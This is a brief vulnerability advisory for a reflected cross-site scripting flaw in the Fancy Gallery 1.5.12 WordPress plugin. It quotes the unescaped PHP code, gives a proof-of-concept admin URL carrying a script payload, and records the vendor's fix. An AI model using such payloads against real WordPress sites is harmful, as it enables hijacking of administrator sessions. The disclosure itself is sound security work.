20-11-2014 / Vulnerabilities

Fancy Gallery 1.5.12 Reflected XSS

$_GET['delete'] is not escaped.

File: fancy-gallery\class.options.php

public function Load_Options_Page(){
	# Check if the user trys to delete a template
	If (IsSet($_GET['delete']) && $this->core->Get_Template_Properties ($_GET['delete'])){ # You can only delete Fancy Gallery Templates!
		Unlink($_GET['delete']);
		WP_Redirect( $this->Get_Options_Page_Url(Array('template_deleted' => 'true')) );
	}
	ElseIf (IsSet($_GET['delete'])){
		WP_Die($this->t('Error while deleting: ' . $_GET['delete']));
	}
}
private function t($text, $context = False){
	return $this->core->t($text, $context);
}

File: fancy-gallery\class.core.php

public function t($text, $content = False){
	return $this->i18n->t($text, $content);
}

File: fancy-gallery\class.i18n.php

public function t ($text, $context = Null){
	# Translates the string $text with context $context
	If (Empty($context))
		return Translate ($text, __CLASS__);
	Else
		return Translate_With_GetText_Context ($text, $context, __CLASS__);
}

Proof of Concept

XSS will be visible for admin:

http://wordpress-url/wp-admin/options-general.php?page=WordPress/Plugin/Fancy_Gallery/Options&delete=<script>alert(String.fromCharCode(88,83,83,50));</script>

Timeline

  • 13-11-2014: Discovered
  • 13-11-2014: Vendor notified
  • 16-11-2014: Version 1.5.13 released, issue resolved